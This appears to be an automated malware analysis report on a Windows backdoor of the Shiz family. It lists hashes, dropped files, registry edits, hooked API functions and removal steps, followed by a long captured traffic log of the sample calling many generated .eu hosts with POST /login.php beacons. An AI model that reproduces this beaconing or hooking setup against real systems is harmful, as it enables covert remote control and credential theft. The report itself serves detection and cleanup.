HEUR:Backdoor.Win32.Generic (Kaspersky), Gen:Heur.Zybut.1 (B) (Emsisoft), Gen:Heur.Zybut.1 (AdAware), Backdoor.Win32.Shiz.FD, Shiz.YR, GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR (Lavasoft MAS)
Behaviour: Backdoor
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 2786cbabcd57f37bc167ceb8a7c6de6c
SHA1: 8ab8c1f4da624c6863c18e4d0eaaa31155084cf8
SHA256: 9b885c3d036a2f94b2352322383e6799aecb038d539f48054b91cc393168f725
SSDeep: 6144:BgiD9CmFlaRUdduv9sZIUlfxryHfvau9hHoyrnETB2ebz:T9C3N2ZIUl4/njr8B2Yz
Size: 263680 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: no certificate found
Created at: 2008-01-10 22:31:36
Analyzed on: WindowsXP SP3 32-bit
Summary: Backdoor. Malware that enables remote control of the victim's machine.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Backdoor creates the following process(es):
%original file name%.exe:1616
The Backdoor injects its code into the following process(es):
Explorer.EXE:1572
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:1616 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%System%\config\software (3251 bytes)
%System%\config\SOFTWARE.LOG (5347 bytes)
%WinDir%\AppPatch\jsvlax.exe (1951 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp (0 bytes)
Registry activity
The process %original file name%.exe:1616 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 57 EC 37 72 FE 84 78 F8 19 E4 84 17 62 F0 2E"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%WinDir%\apppatch\jsvlax.exe_, \??\%WinDir%\apppatch\jsvlax.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"a8a67a25" = (binary data; not printable)
Dropped PE files
MD5 | File path |
---|---|
91f2d8066a31de887e48e30545ce8816 | c:\WINDOWS\AppPatch\jsvlax.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Backdoor installs the following user-mode hooks in CRYPT32.dll:
CertVerifyCertificateChainPolicy
The Backdoor installs the following user-mode hooks in WININET.dll:
HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetWriteFileExA
InternetQueryDataAvailable
HttpSendRequestExW
InternetReadFile
HttpSendRequestA
InternetCloseHandle
The Backdoor installs the following user-mode hooks in USER32.dll:
GetWindowTextA
GetClipboardData
SendInput
GetMessageA
GetMessageW
TranslateMessage
The Backdoor installs the following user-mode hooks in ADVAPI32.dll:
CryptEncrypt
The Backdoor installs the following user-mode hooks in WS2_32.dll:
WSASend
recv
gethostbyname
WSARecv
send
The Backdoor installs the following user-mode hooks in kernel32.dll:
CreateFileW
Propagation
Removals
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1616
- Delete the original Backdoor file.
- Delete or disinfect the following files created/modified by the Backdoor:
%System%\config\software (3251 bytes)
%System%\config\SOFTWARE.LOG (5347 bytes)
%WinDir%\AppPatch\jsvlax.exe (1951 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: flouncey
Product Name: Canorousness
Product Version: 1.7.4.9
Legal Copyright: Knitter
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 3.8.7.1
File Description: africanthropus
Comments:
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
UPX1 | 4096 | 3381 | 3584 | 4.11995 | 5ca8758b50bde507e627becdf44a6897 |
.text | 8192 | 18397 | 18432 | 4.10307 | d3d0964c061dc60f7916c3972277c4a6 |
.b | 28672 | 67171 | 2048 | 4.03977 | 0e8429d2ddee1efcf0d0af1ab7fab5ed |
.rdata | 98304 | 27457 | 1536 | 2.88669 | 68e2621575b0ea1d4e93cd3680b56226 |
.edata | 126976 | 114375 | 76288 | 5.53033 | 0a8c26a3a29305690056c6cd49665ea4 |
.data | 241664 | 285014 | 6656 | 5.15793 | 5567b42cb2577da1dff07341a38ec095 |
.edata | 528384 | 192535 | 146432 | 5.53186 | 1434184dc08b2c631cb66d45420529d0 |
.tXJuJ | 724992 | 633252 | 4608 | 0 | b1e27aa018409de6bfd73f8afb883a65 |
.rsrc | 1359872 | 2572 | 3072 | 3.70019 | f55779d590a38be7408c663b2921f237 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 2
f331d7b25b956ea87d59ad294c0a9060
4790b969fbec046133f300fe459f8f0d
Network Activity
URLs
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /domain/fodakyhijyv.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=56531f80c1f00a0d974859702a1ece40; domain=.fodakyhijyv.eu
Location: hXXp://xsso.fodakyhijyv.eu/56531f80c1f00a0d974859702a1ece40
3e..Go hXXp://xsso.fodakyhijyv.eu/56531f80c1f00a0d974859702a1ece40..0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: marytymenok.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/marytymenok.eu
Set-Cookie: btst=50f0100787987c2c428a9f0fa37a4606|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: tufecagemyl.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:35 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww92.tufecagemyl.eu
Vary: Accept-Encoding
GET /domain/nojejecebuw.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=367a5a5db4f631d0cc1ad3c79b85b63a; domain=.nojejecebuw.eu
Location: hXXp://xsso.nojejecebuw.eu/367a5a5db4f631d0cc1ad3c79b85b63a
3e..Go hXXp://xsso.nojejecebuw.eu/367a5a5db4f631d0cc1ad3c79b85b63a..0..
GET /domain/qeqinuqypoq.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=bd3d82839c544969cd7e5b6b151fa69e; domain=.qeqinuqypoq.eu
Location: hXXp://xsso.qeqinuqypoq.eu/bd3d82839c544969cd7e5b6b151fa69e
3e..Go hXXp://xsso.qeqinuqypoq.eu/bd3d82839c544969cd7e5b6b151fa69e..0..
GET /be7c0ab0ac1acf15c755867799d818c8 HTTP/1.1
Host: xsso.lyvejujolec.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=921732dff967db654c4cf7d27e59db6c|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=be7c0ab0ac1acf15c755867799d818c8; domain=.lyvejujolec.eu
19..Landed lyvejujolec.eu<br>..0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: tucyguqaciq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/tucyguqaciq.eu
Set-Cookie: btst=e3ae6590680be4ef924aaa5811bb8a71|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..
GET /daf1516824a145639bf41787e2765d81 HTTP/1.1
Host: xsso.gatedyhavyd.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=5cdf1e54d8e3563b09609288cb6405b8|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=daf1516824a145639bf41787e2765d81; domain=.gatedyhavyd.eu
19..Landed gatedyhavyd.eu<br>..0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qekenilacap.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Fri, 20 Nov 2015 09:09:08 GMT
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 287
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<hr>.<address>Apache/2.2.22 (Debian) Server at qekenilacap.eu Port 80</address>.</body></html>.....
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vocakemenir.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:40 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww62.vocakemenir.eu
Vary: Accept-Encoding
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: rynazuqihoj.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/rynazuqihoj.eu
Set-Cookie: btst=db559cd2ebfad778907f69945582240c|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: mamixikusah.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:35 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww92.mamixikusah.eu
Vary: Accept-Encoding
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuxusujenes.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx/1.4.6 (Ubuntu)
Date: Fri, 20 Nov 2015 09:10:30 GMT
Content-Type: text/html
Content-Length: 579
Connection: keep-alive
<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.4.6 (Ubuntu)</center>..</body>..</html>..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->......
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: fodakyhijyv.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/fodakyhijyv.eu
Set-Cookie: btst=f8b55f9acdb8cb9696d32f18dbcea0d8|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryleryqacic.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:34 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww92.ryleryqacic.eu
Vary: Accept-Encoding
GET /367a5a5db4f631d0cc1ad3c79b85b63a HTTP/1.1
Host: xsso.nojejecebuw.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=b36799928aa683da3e97e7666bae6fc8|194.242.96.218|1448010560|1448010560|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=367a5a5db4f631d0cc1ad3c79b85b63a; domain=.nojejecebuw.eu
19..Landed nojejecebuw.eu<br>..0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vofozymufok.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/vofozymufok.eu
Set-Cookie: btst=c8d42d911f82f5e93b0d5af0b5bed915|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.vocakemenir.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:18:33 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.qetuluvolos.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:14 GMT
Server: Apache
Set-Cookie: vsid=914vr1955561546911765; expires=Wed, 18-Nov-2020 09:09:14 GMT; path=/; domain=ww92.qetuluvolos.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_FdfVp3qmd7GRqViRDr1/BuqYVKM/PT/wsExrtIQCWY5wMO8yc/A6wGeskiiH45fFPSkQqlGjcss4YTmqvh20rA==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET /1acef55da687a834a563e6c7f72341c6 HTTP/1.1
Host: xsso.kemocujufys.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=cc6592e9d00c7d5db9df2b8578caaed5|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=1acef55da687a834a563e6c7f72341c6; domain=.kemocujufys.eu
19..Landed kemocujufys.eu<br>..0..
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.pupujeguper.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:18:29 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick
5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title>pupujeguper.eu</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'pupujeguper.eu';.var uniqueTrackingID = 'MTQ0ODAxMDU0NS4wNTQ3OjQyZjQwZTBkYTEyMWMwNTJmNzFiYmZjNzQ4YWU4M2Q3NzUwMWRlMmU1Y2U1ZmVjNjMyMDc4MjAyN2Q2OTUzNGU6NTY0ZWUzMzEwZDY1ZQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='hXXp://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type='text/javascript' language='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fGJ1Y2tldDA0N3x8fHw1NjRlZTMzMDdlNzc5fHx8MTQ0ODAxMDU0NS4wNjMxfGM4Y2RlZmIxNWYyMWNhM2EwNTI1M2YwNzUyM2QwMzg1ZDViMmU1NjR8fHx8fDF8fHwwfDU2NGVlMzMxODhmYmNlNjA5MjhiNGEzMnx8fDB8fHx8fHwwfHx8fHx8fHx8';</script>..</head>..<body>...<script type='text/javascript' language='JavaScript'>.window.onload = function() {..if(clickTracking && typeof track_onclick == 'function') track_onclick("899acbee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/
<<< skipped >>>
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryhuzilywax.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:40 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww92.ryhuzilywax.eu
Vary: Accept-Encoding
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryhuzilywax.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:42 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww62.ryhuzilywax.eu
Vary: Accept-Encoding
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kevedorozup.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:34 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww92.kevedorozup.eu
Vary: Accept-Encoding
GET /domain/nopegymozow.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=90623dde15463e9fb45001ad5063db65; domain=.nopegymozow.eu
Location: hXXp://xsso.nopegymozow.eu/90623dde15463e9fb45001ad5063db65
3e..Go hXXp://xsso.nopegymozow.eu/90623dde15463e9fb45001ad5063db65..0..
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.digusebyvad.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:19:08 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick
5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title>digusebyvad.eu</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'digusebyvad.eu';.var uniqueTrackingID = 'MTQ0ODAxMDU4NC43Nzg2OjQzYzZiNDhjNDEyMjdkMTVkYzM3MTkyYzYwYmRiZGFjYWZiZDQzMTA5MDk2NmEzOWM3Y2IyNmM0ZTJmOWM3YjA6NTY0ZWUzNThiZTE4Yg==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='hXXp://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type='text/javascript' language='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fGJ1Y2tldDA0N3x8fHw1NjRlZTM1OGJjZTBhfHx8MTQ0ODAxMDU4NC43ODIyfDAxOWQ2MDBhYmU5MmRhM2Y2ODc2YjA3ZWEyZDkzMzYyYWJhNTYwZmV8fHx8fDF8fHwwfDU2NGVlMzU4MWQzNTNkZTAwOThiNWYxNXx8fDB8fHx8fHwwfHx8fHx8fHx8';</script>..</head>..<body>...<script type='text/javascript' language='JavaScript'>.window.onload = function() {..if(clickTracking && typeof track_onclick == 'function') track_onclick("899acbee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/
<<< skipped >>>
GET /56531f80c1f00a0d974859702a1ece40 HTTP/1.1
Host: xsso.fodakyhijyv.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
